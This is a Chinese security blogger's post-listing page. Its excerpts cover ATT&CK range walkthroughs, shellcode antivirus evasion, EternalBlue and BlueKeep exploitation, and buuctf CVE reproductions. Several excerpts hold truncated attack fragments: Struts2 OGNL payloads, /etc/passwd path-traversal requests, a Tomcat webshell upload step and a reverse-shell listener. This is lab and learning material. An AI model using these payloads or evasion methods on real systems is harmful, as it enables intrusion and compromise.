自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(73)
  • 收藏
  • 关注

原创 ATT&CK靶场系列(六)

一、环境配置vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/

2021-12-21 02:05:43 4446 9

原创 ATT&CK靶场系列(五)

一、环境配置vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/虚拟机密码win7sun\heart 123.comsun\Administrator dc123.comWin7双网卡模拟内外网2008sun\admin 2020.com网络环境配置如下:二、前期信息收集使用nmap对外网ip段进行信息收集nmap -A -v -T4 192.168.135.15

2021-12-05 11:36:22 3324 2

原创 ATT&CK靶场系列(七)

一、环境配置vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/DMZ区IP段为192.168.1.1/24第二层网络环境IP段为192.168.52.1/24第三层网络环境IP段为192.168.93.1/24按着上面的图片把相关的ip段给配置就行DMZ区域:给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。第二层网络区域:给U

2021-12-04 23:11:28 7033

原创 ATT&CK靶场系列(四)

一、环境配置vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/拓扑结构

2021-11-30 15:35:37 3974

原创 ATT&CK靶场系列(三)

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/拓扑结构大体如下:百度网盘: https://pan.baidu.com/s/1iy4MIy6ni6d9F3iypeCYVQ密码: 【红日安全】您的下载密码为:7mhi。环境配置打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取

2021-11-29 16:18:35 3045 7

原创 Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家

前言分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷杀毒原理360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。1.基于特征码的静态扫描技术这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今

2021-08-22 00:10:01 17595 6

原创 CVE-2019-0708蠕虫级漏洞利用

前言Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞利用靶机win7旗舰版sp1 ip:192.168.111.128攻击机kali ip:192.168.111.130先在靶机上把远程连接这里设置了回到kali对靶机进行扫描 db_nmap -sT -T4 192.168.111.128那

2021-08-20 23:59:25 759

原创 永恒之蓝MS17-010漏洞利用

前言永恒之蓝(Eternal Blue) 爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。SMB(全称是Server Message Block) 是一个协议服务器信息块,它是一种客户机/服

2021-08-20 21:29:06 3043 7

原创 ATT&CK靶场系列(二)

vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/拓扑结构大体如下:靶机下载地址: https://pan.baidu.com/s/13nU-0vsGBnGejGCKzwphfQ&shfl=sharepset提取码:41y6开机密码:1qaz@WSX因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。DC配置 :D

2021-04-12 22:57:24 1818 4

原创 buuctf [Jboss]CVE-2017-12149

漏洞描述JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。在/invoker/readonly路径下,攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测,导致攻击者可以执行任意代码。https://juejin.cn/post/6869587131678294023漏洞影响JBoss 5.x - 6.x漏洞复现https://github.com/yunxu1/jboss-_CVE-2017-12149执行成功,打

2021-04-03 22:33:19 480

原创 buuctf [Postgres]CVE-2019-9193

漏洞描述PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。PostgreSQL特点:支持WINDOWS、Linux、Solaris、macOS 、BSD。支持文本、图像、视频、声音等支持ACID、关联完整性、数据库事务、Unicode多国语言。支持临时表,与物化视图支持SQL的许多功能,例如复杂的SQL查询

2021-04-02 00:10:27 563

原创 buuctf [Rails]CVE-2019-5418

漏洞描述Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代,而它的目标,就是让 Web 开发方面的生活,变得更轻松。在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。https://www.freebuf.com/

2021-04-01 23:42:46 502 4

原创 buuctf [GhostScript]CVE-2018-16509

漏洞描述GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。https://blog.csdn.net/JiangBuLiu/article/details/95061202漏洞影响Ghostscript 9.24之前版本漏洞复现直接上传一个png打poc%!PSuserdict /setpagedevice undefsavelegal{

2021-03-31 20:14:45 589

原创 buuctf [Django]CVE-2017-12794

漏洞描述Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。https://blog.csdn.net/zy15667076526/article/details/111134982漏洞影响Djang

2021-03-31 20:07:10 580

原创 buuctf [GhostScript]CVE-2018-19475

漏洞描述8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限

2021-03-30 22:25:21 442

原创 buuctf [Drupal]CVE-2018-7602

漏洞描述Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 7.x版本和8.x版本中的存在存在远程代码执行漏洞。远程攻击者可利用该中断执行任意代码。http://blog.nsfocus.net/drupal-cve-2018-7602/https://blog.csdn.net/weixin_427

2021-03-30 08:32:09 461

原创 buuctf [Supervisor]CVE-2017-11610

漏洞描述Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。https://blog.csdn.net/qq_37964989/article/details/89454076漏洞影响supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,

2021-03-28 20:32:12 272

原创 buuctf [Libssh]CVE-2018-10933

漏洞描述2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可以进行一些恶意操作。https://blog.csdn.net/xuandao_ahfengren/article/deta

2021-03-27 22:29:20 348

原创 buuctf [WebLogic]CVE-2018-2894

漏洞描述(CVE-2018-2894)Weblogic任意文件上传Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。利用条件:需要知道部署应用的web目录https:/

2021-03-26 17:04:30 735

原创 buuctf [ElasticSearch]CVE-2015-3337

漏洞描述在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。https://www.freebuf.com/vuls/99942.html添加链接描述漏洞影响影响版本:1.4.5以下/1.5.2以下漏洞复现访问/_plugin/head/…/…/…/…/…/…/…/…/…/etc/passwd读取任意文件(不要在浏览器访问):head插件head插件提供了elasticsearch的前

2021-03-26 16:27:05 673 2

原创 buuctf [ElasticSearch]CVE-2014-3120

漏洞描述老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。漏洞影响elasticsearch版本:v1.1.1复现过程将Java代码放入json中{ "size": 1, "query": { "filtered": { "query": { "match_all": { } }

2021-03-26 16:03:32 231

原创 buuctf [Nginx]CVE-2013-4547

(CVE-2013-4547)Nginx URI Processing 安全绕过漏洞漏洞描述nginx0.8.41至1.4.3版本和1.5.7之前的1.5.x版本中存在安全漏洞,该漏洞源于程序没有正确验证包含未转义空格字符的请求URI。远程攻击者可利用该漏洞绕过既定的限制。http://www.91ri.org/9064.htmlhttps://blog.csdn.net/Blood_Pupil/article/details/88565176漏洞影响Nginx 0.8.41 ~ 1.4.3 /

2021-03-26 15:04:03 1302

原创 buuctf [PHP]CVE-2019-11043

漏洞描述CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:location ~ [^/].php(/|KaTeX parse error: Can't use function '\.' in math mode at position 38: …pa

2021-03-25 19:48:09 464

原创 buuctf [ElasticSearch]CVE-2015-1427

漏洞描述ElasticSearch是一个JAVA开发的搜索分析引擎。2014年,曾经被曝出过一个 远程代码执行漏洞(CVE-2014-3120) ,漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。Groovy语言“沙盒”ElasticSearch支持使用“在沙盒中的”Groovy语言

2021-03-24 19:45:55 562

原创 buuctf [Weblogic]CVE-2017-10271

漏洞描述Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。https://blog.csdn.net/yumengzth/article/details/97522783https://www.freebuf.com/colum

2021-03-24 00:21:24 671

原创 buuctf [Discuz]wooyun-2010-080723

漏洞描述由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。https://www.secpulse.com/archives/2338.htmlhttps://www.freebuf.com/articles/web/226207.html漏洞复现http://node3.buuoj.cn:28226/install/来安装di

2021-03-23 23:39:07 1557

原创 buuctf [Django]CVE-2019-14234

漏洞描述该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。通过JSONField类获得KeyTransform类并生成sql语句的

2021-03-23 23:10:40 823

原创 buuctf [GlassFish]任意文件读取

漏洞描述glassfish是一款java编写的跨平台的开源的应用服务器。java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。漏洞复现访问https://node3.buuoj.cn:26836/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a

2021-03-23 11:39:58 820 1

原创 buuctf [HTTPD]apache_parsing_vulnerability

漏洞描述Apache多后缀解析漏洞(apache_parsing_vulnerability)Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。以上就是Apache多后

2021-03-23 09:52:38 826

原创 buuctf [struts2]s2-015

漏洞描述基于通配符定义的动作映射,如果一个请求跟任何其他定义的操作不匹配,他将会匹配*,并且请求的同操作名称的jsp文件https://blog.csdn.net/qq_45625605/article/details/103138548将:http://node3.buuoj.cn:27791/welcome.action改成:http://node3.buuoj.cn:27791/%25%7B1%2B1%7D.actionPOC%24%7B%23context%5B%27xwork.

2021-03-22 23:47:57 318

原创 buuctf [Nginx]parsing_vulnerability

Nginx 解析漏洞描nginx解析漏洞因为用户配置不当造成的漏洞。解析格式:1.jpg/.php、1.jpg/.php,1.jpg会被当成php格式解析nginx和iis7.x解析漏洞类似,都是加上/.php后文件以php格式解析。配置文件vim /etc/php5/fpm/php.ini、vim /etc/php5/fpm/pool.d/www.conf关键配置项: cgi.fix_pathinfo=1,security.limit_extensions=允许解析其他格式为php,则存在解析

2021-03-22 23:02:49 773

原创 buuctf [PHP]XDebug RCE

打开页面是一个phpinfoXDebug是PHP的一个扩展,用于调试PHP代码。然后可以直接去找lflag,这里复现失败了,原因是该通信是一个反向连接的过程,exp.py启动后其实是会监听本地的9000端口(可通过-l参数指定)并等待XDebug前来连接,所以执行该脚本的服务器必须有外网IP(或者与目标服务器处于同一内网)。文章学习参考https://blog.csdn.net/weixin_43416469/article/details/114143522...

2021-03-22 22:48:51 706

原创 [Tomcat]Tomcat8+ Weak Password && Backend Getshell Vulnerability

弱密码+getshell访问http://node3.buuoj.cn:25141/manager/html弱密码 tomcat tomcat在这个后台,我们可以操作每个应用的状态……以及读取每个应用下的Session。但是这都不是最大的安全隐患制作war包。war包:Java web工程,都是打成war包,进行发布,如果我们的服务器选择TOMCAT等轻量级服务器,一般就打出WAR包进行发布准备好jsp一句话木马,在安装好JDK环境,执行:jar -cvf [war包名称].war 打包目

2021-03-22 09:44:06 702

原创 buuctf [struts2]s2-009

漏洞描述这个漏洞跟s2-003 s2-005 属于一套的。Struts2对s2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;于是Struts2对s2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法

2021-03-22 09:03:55 382

原创 buuctf [PHP]inclusion

通过扫描发现phpinfo.phpPHP LFI学习参考:https://zhuanlan.zhihu.com/p/50445145https://blog.csdn.net/qq_45521281/article/details/106498971?spm=1001.2014.3001.5501https://blog.csdn.net/weixin_30847271/article/details/97824777php版本7.2.25 说明该漏洞与PHP版本无关。…/…/…/…/…

2021-03-22 08:24:44 980

原创 buuctf [struts2]s2-012

漏洞简介如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如:<package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.action.UserAction"> <result name="redirect" type="redirect">/index.jsp?n

2021-03-21 22:21:34 369

原创 buuctf [Jupyter]notebook-rce

Jupyter Notebook 未授权访问漏洞Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多加粗样式种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。复现在Terminal 创建控制台处可以执行任意命令env打印环境变量反弹shell 本机监听nc -lvp 5555# 目标执行bash -i &g

2021-03-21 22:11:49 1049

原创 buuctf [struts2]s2-053

漏洞简介Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。https://www.freebuf.com/vuls/147735.htmlPOC%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#co

2021-03-21 21:57:17 299

原创 buuctf [struts2]s2-005

漏洞简介通过unicode 编码 \u0023 绕过struts对#的过滤,再通过设置xwork.MethodAccessor.denyMethodExecution 为false 和memberAccess.allowStaticMethodAccess为true 来绕过沙盒https://blog.csdn.net/Fly_hps/article/details/85000125POC/example/HelloWorld.action?%28%27%5Cu0023context[%5C%27

2021-03-21 09:18:36 419

原创 为Debian 10.2 安装图形化桌面环境

首先先下载x-window的内核:apt-get -u install x-window-system-core下载登录管理界面gdm或kdm:apt-get -u install gdm gdm-themes下载GNOME或KDE:apt-get -u install gnome命令会有提示,输入y即可init 6登陆 这里以腾讯云VNC登陆为例如果无法登陆进去修改vim /etc/pam.d/gdm-password auth requied pam_succeed_if.so us

2021-03-20 00:05:28 3181

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除